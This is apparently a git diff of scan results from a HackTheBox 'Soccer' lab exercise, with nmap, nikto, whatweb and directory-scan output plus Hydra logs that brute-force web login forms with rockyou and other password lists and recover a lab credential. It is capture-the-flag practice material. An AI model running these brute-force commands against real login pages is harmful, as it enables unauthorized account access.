+<center><h1>301 Moved Permanently</h1></center>
+<hr><center>nginx/1.18.0 (Ubuntu)</center>
+</body>
+</html>
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_curl.html
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_curl.html
@@ -0,0 +1,16 @@
+HTTP/1.1 301 Moved Permanently
+Server: nginx/1.18.0 (Ubuntu)
+Date: Fri, 27 Jan 2023 09:42:19 GMT
+Content-Type: text/html
+Content-Length: 178
+Connection: keep-alive
+Location: http://soccer.htb/
+
+<html>
+<head><title>301 Moved Permanently</title></head>
+<body>
+<center><h1>301 Moved Permanently</h1></center>
+<hr><center>nginx/1.18.0 (Ubuntu)</center>
+</body>
+</html>
+
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_dev_nikto.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_dev_nikto.txt
@@ -0,0 +1,17 @@
+- Nikto v2.1.6
+---------------------------------------------------------------------------
+ Target IP:          10.10.11.194
+ Target Hostname:    dev.soccer.htb
+ Target Port:        80
+ Start Time:         2023-01-31 23:24:47 (GMT1)
+---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://soccer.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7863 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-01-31 23:29:19 (GMT1) (272 seconds)
+---------------------------------------------------------------------------
+ 1 host(s) tested
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt
@@ -0,0 +1,2 @@
+WLD      GET        7l       12w      178c Got 301 for http://10.10.11.194/805749485a5b4fe19ef44e590a9b4ed2 (url length: 32)
+WLD         -         -         - http://10.10.11.194/805749485a5b4fe19ef44e590a9b4ed2 => http://soccer.htb/805749485a5b4fe19ef44e590a9b4ed2
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt
@@ -0,0 +1,11 @@
+# Hydra v9.4 run at 2023-01-31 22:51:31 on dev.soccer.htb http-post-form (hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 22:52:45 on dev.soccer.htb http-post-form (hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 22:54:07 on dev.soccer.htb http-post-form (hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 22:54:28 on dev.soccer.htb http-post-form (hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt -v -F http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 22:55:38 on dev.soccer.htb http-post-form (hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt -V http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 22:56:39 on dev.soccer.htb http-post-form (hydra -l soccer -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt -V http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 22:57:48 on dev.soccer.htb http-post-form (hydra -l soccer -P /usr/share/wordlists/rockyou.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt -F http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 22:58:16 on dev.soccer.htb http-post-form (hydra -l soccer -P /usr/share/wordlists/rockyou.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt -F -V http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 23:05:05 on dev.soccer.htb http-post-form (hydra -L users -P /usr/share/wordlists/rockyou.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt -F http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+# Hydra v9.4 run at 2023-01-31 23:07:58 on dev.soccer.htb http-post-form (hydra -L users -P /usr/share/wordlists/rockyou.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt -F -t 64 -I http-post-form://dev.soccer.htb/login.php:username=^USER^&password=^PASS^:login-error)
+[80][http-post-form] host: dev.soccer.htb   login: soccer   password: lab4jay
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_known-security.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_known-security.txt
@@ -0,0 +1,15 @@
+HTTP/1.1 301 Moved Permanently
+Server: nginx/1.18.0 (Ubuntu)
+Date: Fri, 27 Jan 2023 09:42:19 GMT
+Content-Type: text/html
+Content-Length: 178
+Connection: keep-alive
+Location: http://soccer.htb/.well-known/security.txt
+
+<html>
+<head><title>301 Moved Permanently</title></head>
+<body>
+<center><h1>301 Moved Permanently</h1></center>
+<hr><center>nginx/1.18.0 (Ubuntu)</center>
+</body>
+</html>
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_nikto.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_nikto.txt
@@ -0,0 +1,13 @@
+- Nikto v2.1.6
+---------------------------------------------------------------------------
+ Target IP:          10.10.11.194
+ Target Hostname:    10.10.11.194
+ Target Port:        80
+ Start Time:         2023-01-31 22:21:34 (GMT1)
+---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://soccer.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_nmap.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_nmap.txt
@@ -0,0 +1,115 @@
+# Nmap 7.93 scan initiated Fri Jan 27 10:42:19 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.026s latency).
+Scanned at 2023-01-27 10:42:19 CET for 70s
+
+Bug in http-security-headers: no string output.
+PORT   STATE SERVICE REASON  VERSION
+80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
+|_http-fetch: Please enter the complete path of the directory to save data in.
+| http-referer-checker: 
+| Spidering limited to: maxpagecount=30
+|   https://cdn.jsdelivr.net:443/npm/bootstrap15.2.2/dist/js/bootstrap.bundle.min.js
+|   http://maxcdn.bootstrapcdn.com:80/bootstrap/4.1.1/js/bootstrap.min.js
+|   http://cdnjs.cloudflare.com:80/ajax/libs/jquery/3.2.1/jquery.min.js
+|_  https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js
+|_http-chrono: Request times for /; avg: 167.91ms; min: 157.46ms; max: 176.69ms
+|_http-mobileversion-checker: No mobile version detected.
+| http-sitemap-generator: 
+|   Directory structure:
+|     /
+|       Other: 1; jpg: 4
+|   Longest directory structure:
+|     Depth: 0
+|     Dir: /
+|   Total files found (by extension):
+|_    Other: 1; jpg: 4
+|_http-dombased-xss: Couldn't find any DOM based XSS.
+| http-headers: 
+|   Server: nginx/1.18.0 (Ubuntu)
+|   Date: Fri, 27 Jan 2023 09:42:28 GMT
+|   Content-Type: text/html
+|   Content-Length: 6917
+|   Last-Modified: Thu, 17 Nov 2022 08:07:11 GMT
+|   Connection: close
+|   ETag: "6375ebaf-1b05"
+|   Accept-Ranges: bytes
+|   
+|_  (Request type: HEAD)
+| http-vuln-cve2011-3192: 
+|   VULNERABLE:
+|   Apache byterange filter DoS
+|     State: VULNERABLE
+|     IDs:  CVE:CVE-2011-3192  BID:49303
+|       The Apache web server is vulnerable to a denial of service attack when numerous
+|       overlapping byte ranges are requested.
+|     Disclosure date: 2011-08-19
+|     References:
+|       https://seclists.org/fulldisclosure/2011/Aug/175
+|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
+|       https://www.securityfocus.com/bid/49303
+|_      https://www.tenable.com/plugins/nessus/55976
+|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
+|_http-jsonp-detection: Couldn't find any JSONP endpoints.
+| http-comments-displayer: 
+| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=soccer.htb
+|     
+|     Path: http://soccer.htb:80/
+|     Line number: 145
+|     Comment: 
+|         <!-- /.container -->
+|     
+|     Path: http://soccer.htb:80/
+|     Line number: 142
+|     Comment: 
+|         <!-- /.row -->
+|     
+|     Path: http://soccer.htb:80/
+|     Line number: 106
+|     Comment: 
+|_        <!-- Page Content -->
+| http-vhosts: 
+|_128 names had status 301
+|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
+|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
+|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
+| http-php-version: Logo query returned unknown hash ad6ef659069e5f1721a5932f71942408
+|_Credits query returned unknown hash ad6ef659069e5f1721a5932f71942408
+|_http-title: Soccer - Index 
+|_http-errors: Couldn't find any error pages.
+|_http-csrf: Couldn't find any CSRF vulnerabilities.
+|_http-exif-spider: ERROR: Script execution failed (use -d to debug)
+|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
+|_http-date: Fri, 27 Jan 2023 09:42:28 GMT; 0s from local time.
+| http-useragent-tester: 
+|   Status for browser useragent: 200
+|   Allowed User Agents: 
+|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
+|     libwww
+|     lwp-trivial
+|     libcurl-agent/1.0
+|     PHP/
+|     Python-urllib/2.5
+|     GT::WWW
+|     Snoopy
+|     MFC_Tear_Sample
+|     HTTP::Lite
+|     PHPCrawl
+|     URI::Fetch
+|     Zend_Http_Client
+|     http client
+|     PECL::HTTP
+|     Wget/1.13.4 (linux-gnu)
+|_    WWW-Mechanize/1.34
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+|_http-config-backup: ERROR: Script execution failed (use -d to debug)
+|_http-feed: Couldn't find any feeds.
+|_http-malware-host: Host appears to be clean
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:43:30 2023 -- 1 IP address (1 host up) scanned in 70.83 seconds
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_screenshot.png
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_screenshot.png
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_soccer.htb_vhosts_subdomains-top1million-110000.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_soccer.htb_vhosts_subdomains-top1million-110000.txt
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_tiny_form_hydra.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_tiny_form_hydra.txt
@@ -0,0 +1,2 @@
+# Hydra v9.4 run at 2023-02-01 11:12:33 on soccer.htb http-post-form (hydra -L users -P /usr/share/wordlists/rockyou.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_tiny_form_hydra.txt -F -V http-post-form://soccer.htb/login.php:fm_usr=^USER^&fm_pwd=^PASS^:Login failed)
+# Hydra v9.4 run at 2023-02-01 11:21:10 on soccer.htb http-post-form (hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr -s 80 -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_tiny_form_hydra.txt -F -V http-post-form://soccer.htb/login.php:fm_usr=^USER^&fm_pwd=^PASS^:Login failed)
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_whatweb.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_whatweb.txt
@@ -0,0 +1,107 @@
+WhatWeb report for http://10.10.11.194:80
+Status    : 301 Moved Permanently
+Title     : 301 Moved Permanently
+IP        : 10.10.11.194
+Country   : RESERVED, ZZ
+
+Summary   : HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], nginx[1.18.0], RedirectLocation[http://soccer.htb/]
+
+Detected Plugins:
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	OS           : Ubuntu Linux
+	String       : nginx/1.18.0 (Ubuntu) (from server string)
+
+[ RedirectLocation ]
+	HTTP Server string location. used with http-status 301 and
+	302
+
+	String       : http://soccer.htb/ (from location)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 301 Moved Permanently
+	Server: nginx/1.18.0 (Ubuntu)
+	Date: Fri, 27 Jan 2023 09:42:21 GMT
+	Content-Type: text/html
+	Content-Length: 178
+	Connection: close
+	Location: http://soccer.htb/
+
+WhatWeb report for http://soccer.htb/
+Status    : 200 OK
+Title     : Soccer - Index
+IP        : 10.10.11.194
+Country   : RESERVED, ZZ
+
+Summary   : Bootstrap[4.1.1], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], JQuery[3.2.1,3.6.0], nginx[1.18.0], Script, X-UA-Compatible[IE=edge]
+
+Detected Plugins:
+[ Bootstrap ]
+	Bootstrap is an open source toolkit for developing with
+	HTML, CSS, and JS.
+
+	Version      : 4.1.1
+	Version      : 4.1.1
+	Website     : https://getbootstrap.com/
+
+[ HTML5 ]
+	HTML version 5, detected by the doctype declaration
+
+
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	OS           : Ubuntu Linux
+	String       : nginx/1.18.0 (Ubuntu) (from server string)
+
+[ JQuery ]
+	A fast, concise, JavaScript that simplifies how to traverse
+	HTML documents, handle events, perform animations, and add
+	AJAX.
+
+	Version      : 3.2.1,3.6.0
+	Website     : http://jquery.com/
+
+[ Script ]
+	This plugin detects instances of script HTML elements and
+	returns the script language/type.
+
+
+[ X-UA-Compatible ]
+	This plugin retrieves the X-UA-Compatible value from the
+	HTTP header and meta http-equiv tag. - More Info:
+	http://msdn.microsoft.com/en-us/library/cc817574.aspx
+
+	String       : IE=edge
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 200 OK
+	Server: nginx/1.18.0 (Ubuntu)
+	Date: Fri, 27 Jan 2023 09:42:23 GMT
+	Content-Type: text/html
+	Last-Modified: Thu, 17 Nov 2022 08:07:11 GMT
+	Transfer-Encoding: chunked
+	Connection: close
+	ETag: W/"6375ebaf-1b05"
+	Content-Encoding: gzip
+
+
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_wpscan.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_wpscan.txt
@@ -0,0 +1,16 @@
+_______________________________________________________________
+         __          _______   _____
+         \ \        / /  __ \ / ____|
+          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
+           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
+            \  /\  /  | |     ____) | (__| (_| | | | |
+             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
+
+         WordPress Security Scanner by the WPScan Team
+                         Version 3.8.22
+       Sponsored by Automattic - https://automattic.com/
+       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+_______________________________________________________________
+
+
+Scan Aborted: The remote website is up, but does not seem to be running WordPress.
--- a/HTB/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml
+++ b/HTB/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml
@@ -0,0 +1,98 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Fri Jan 27 10:42:19 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.194 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.194" start="1674812539" startstr="Fri Jan 27 10:42:19 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1" services="80"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674812539"/>
+<taskend task="NSE" time="1674812539"/>
+<taskbegin task="NSE" time="1674812539"/>
+<taskend task="NSE" time="1674812539"/>
+<taskbegin task="NSE" time="1674812539"/>
+<taskend task="NSE" time="1674812539"/>
+<taskbegin task="Connect Scan" time="1674812539"/>
+<taskend task="Connect Scan" time="1674812539" extrainfo="1 total ports"/>
+<taskbegin task="Service scan" time="1674812539"/>
+<taskend task="Service scan" time="1674812545" extrainfo="1 service on 1 host"/>
+<taskbegin task="NSE" time="1674812545"/>
+<taskprogress task="NSE" time="1674812576" percent="99.67" remaining="1" etc="1674812576"/>
+<taskprogress task="NSE" time="1674812606" percent="99.67" remaining="1" etc="1674812606"/>
+<taskend task="NSE" time="1674812609"/>
+<taskbegin task="NSE" time="1674812609"/>
+<taskend task="NSE" time="1674812609"/>
+<taskbegin task="NSE" time="1674812609"/>
+<taskend task="NSE" time="1674812609"/>
+<host starttime="1674812539" endtime="1674812609"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.194" addrtype="ipv4"/>
+<hostnames>
+<hostname name="soccer.htb" type="PTR"/>
+</hostnames>
+<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="nginx" version="1.18.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
+</script><script id="http-referer-checker" output="&#xa;Spidering limited to: maxpagecount=30&#xa;  https://cdn.jsdelivr.net:443/npm/bootstrap15.2.2/dist/js/bootstrap.bundle.min.js&#xa;  http://maxcdn.bootstrapcdn.com:80/bootstrap/4.1.1/js/bootstrap.min.js&#xa;  http://cdnjs.cloudflare.com:80/ajax/libs/jquery/3.2.1/jquery.min.js&#xa;  https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js&#xa;"/><script id="http-chrono" output="Request times for /; avg: 167.91ms; min: 157.46ms; max: 176.69ms"/><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-security-headers" output=""></script><script id="http-sitemap-generator" output="&#xa;  Directory structure:&#xa;    /&#xa;      Other: 1; jpg: 4&#xa;  Longest directory structure:&#xa;    Depth: 0&#xa;    Dir: /&#xa;  Total files found (by extension):&#xa;    Other: 1; jpg: 4&#xa;"/><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-headers" output="&#xa;  Server: nginx/1.18.0 (Ubuntu)&#xa;  Date: Fri, 27 Jan 2023 09:42:28 GMT&#xa;  Content-Type: text/html&#xa;  Content-Length: 6917&#xa;  Last-Modified: Thu, 17 Nov 2022 08:07:11 GMT&#xa;  Connection: close&#xa;  ETag: &quot;6375ebaf-1b05&quot;&#xa;  Accept-Ranges: bytes&#xa;  &#xa;  (Request type: HEAD)&#xa;"/><script id="http-vuln-cve2011-3192" output="&#xa;  VULNERABLE:&#xa;  Apache byterange filter DoS&#xa;    State: VULNERABLE&#xa;    IDs:  CVE:CVE-2011-3192  BID:49303&#xa;      The Apache web server is vulnerable to a denial of service attack when numerous&#xa;      overlapping byte ranges are requested.&#xa;    Disclosure date: 2011-08-19&#xa;    References:&#xa;      https://seclists.org/fulldisclosure/2011/Aug/175&#xa;      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192&#xa;      https://www.securityfocus.com/bid/49303&#xa;      https://www.tenable.com/plugins/nessus/55976&#xa;"><table key="CVE-2011-3192">
+<elem key="title">Apache byterange filter DoS</elem>
+<elem key="state">VULNERABLE</elem>
+<table key="ids">
+<elem>CVE:CVE-2011-3192</elem>
+<elem>BID:49303</elem>
+</table>
+<table key="description">
+<elem>The Apache web server is vulnerable to a denial of service attack when numerous&#xa;overlapping byte ranges are requested.</elem>
+</table>
+<table key="dates">
+<table key="disclosure">
+<elem key="year">2011</elem>
+<elem key="day">19</elem>
+<elem key="month">08</elem>
+</table>
+</table>
+<elem key="disclosure">2011-08-19</elem>
+<table key="refs">
+<elem>https://seclists.org/fulldisclosure/2011/Aug/175</elem>
+<elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192</elem>
+<elem>https://www.securityfocus.com/bid/49303</elem>
+<elem>https://www.tenable.com/plugins/nessus/55976</elem>
+</table>
+</table>
+</script><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-comments-displayer" output="&#xa;Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=soccer.htb&#xa;    &#xa;    Path: http://soccer.htb:80/&#xa;    Line number: 145&#xa;    Comment: &#xa;        &lt;!-&#45; /.container -&#45;&gt;&#xa;    &#xa;    Path: http://soccer.htb:80/&#xa;    Line number: 142&#xa;    Comment: &#xa;        &lt;!-&#45; /.row -&#45;&gt;&#xa;    &#xa;    Path: http://soccer.htb:80/&#xa;    Line number: 106&#xa;    Comment: &#xa;        &lt;!-&#45; Page Content -&#45;&gt;&#xa;"/><script id="http-vhosts" output="&#xa;128 names had status 301"/><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-php-version" output="Logo query returned unknown hash ad6ef659069e5f1721a5932f71942408&#xa;Credits query returned unknown hash ad6ef659069e5f1721a5932f71942408"/><script id="http-title" output="Soccer - Index "><elem key="title">Soccer - Index </elem>
+</script><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-exif-spider" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-date" output="Fri, 27 Jan 2023 09:42:28 GMT; 0s from local time."><elem key="date">2023-01-27T09:42:28+00:00</elem>
+<elem key="delta">0.0</elem>
+</script><script id="http-useragent-tester" output="&#xa;  Status for browser useragent: 200&#xa;  Allowed User Agents: &#xa;    Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa;    libwww&#xa;    lwp-trivial&#xa;    libcurl-agent/1.0&#xa;    PHP/&#xa;    Python-urllib/2.5&#xa;    GT::WWW&#xa;    Snoopy&#xa;    MFC_Tear_Sample&#xa;    HTTP::Lite&#xa;    PHPCrawl&#xa;    URI::Fetch&#xa;    Zend_Http_Client&#xa;    http client&#xa;    PECL::HTTP&#xa;    Wget/1.13.4 (linux-gnu)&#xa;    WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
+<table key="Allowed User Agents">
+<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
+<elem>libwww</elem>
+<elem>lwp-trivial</elem>
+<elem>libcurl-agent/1.0</elem>
+<elem>PHP/</elem>
+<elem>Python-urllib/2.5</elem>
+<elem>GT::WWW</elem>
+<elem>Snoopy</elem>
+<elem>MFC_Tear_Sample</elem>
+<elem>HTTP::Lite</elem>
+<elem>PHPCrawl</elem>
+<elem>URI::Fetch</elem>
+<elem>Zend_Http_Client</elem>
+<elem>http client</elem>
+<elem>PECL::HTTP</elem>
+<elem>Wget/1.13.4 (linux-gnu)</elem>
+<elem>WWW-Mechanize/1.34</elem>
+</table>
+</script><script id="http-server-header" output="nginx/1.18.0 (Ubuntu)"><elem>nginx/1.18.0 (Ubuntu)</elem>
+</script><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-feed" output="Couldn&apos;t find any feeds."/><script id="http-malware-host" output="Host appears to be clean"/><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+</table>
+</script><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/></port>
+</ports>
+<times srtt="26447" rttvar="26447" to="132235"/>
+</host>
+<taskbegin task="NSE" time="1674812610"/>
+<taskend task="NSE" time="1674812610"/>
+<taskbegin task="NSE" time="1674812610"/>
+<taskend task="NSE" time="1674812610"/>
+<taskbegin task="NSE" time="1674812610"/>
+<taskend task="NSE" time="1674812610"/>
+<runstats><finished time="1674812610" timestr="Fri Jan 27 10:43:30 2023" summary="Nmap done at Fri Jan 27 10:43:30 2023; 1 IP address (1 host up) scanned in 70.83 seconds" elapsed="70.83" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/soccer/results/scans/tcp9091/tcp_9091_http_nikto.txt
+++ b/HTB/soccer/results/scans/tcp9091/tcp_9091_http_nikto.txt
@@ -0,0 +1,16 @@
+- Nikto v2.1.6
+---------------------------------------------------------------------------
+ Target IP:          10.10.11.194
+ Target Hostname:    10.10.11.194
+ Target Port:        9091
+ Start Time:         2023-01-31 22:28:45 (GMT1)
+---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Error limit (20) reached for host, giving up. Last error: 
+ Scan terminated:  0 error(s) and 2 item(s) reported on remote host
+ End Time:           2023-01-31 22:34:52 (GMT1) (367 seconds)
+---------------------------------------------------------------------------
+ 1 host(s) tested
--- a/HTB/soccer/results/scans/xml/_full_tcp_nmap.xml
+++ b/HTB/soccer/results/scans/xml/_full_tcp_nmap.xml
@@ -0,0 +1,74 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
